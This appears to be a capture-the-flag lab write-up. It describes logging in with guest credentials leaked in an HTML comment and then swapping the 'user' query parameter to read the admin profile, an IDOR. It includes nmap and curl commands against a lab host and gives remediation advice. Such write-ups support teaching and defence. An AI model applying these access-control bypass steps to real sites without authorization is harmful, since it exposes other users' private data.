Case file

Guest login IDOR to admin profile via user parameter

Foundations web engagement: HTML comment leaked guest:guest; profile.php?user= accepted horizontal privilege escalation to the admin profile.

Foundations14 minWeb · IDOR · Access Control
01

Engagement summary

Guest credentials from a source comment authenticated; swapping the user query parameter exposed another account’s secrets.

NEIGHBOUR exposed SSH and Apache. The login page source contained <!-- use guest:guest credentials until registration is fixed -->. After login, profile.php?user=guest rendered the guest profile. Changing user=admin (or another account name) returned that user’s protected content without a server-side ownership check — classic IDOR.

Business impact

Object references taken from the client without authorization checks leak PII and secrets across tenants. Enforce server-side ownership on every object id; never leave temporary credentials in HTML comments.

02

Guest foothold and parameter swap

guest:guest login; user= parameter IDOR disclosed admin content.

OPERATOR · WEB

savvy@lab:~$ nmap -sV 10.49.151.21

22/tcp open ssh

80/tcp open http Apache httpd 2.4.53

savvy@lab:~$ curl -s http://10.49.151.21/ | grep -i guest

<!-- use guest:guest credentials until registration is fixed -->

savvy@lab:~$ curl -s -b 'PHPSESSID=<session>' 'http://10.49.151.21/profile.php?user=admin'

# admin profile / secret rendered

Remediation

Map sessions to allowed object ids in the data layer. Remove debug comments from production. Add automated IDOR tests that swap ids across two accounts.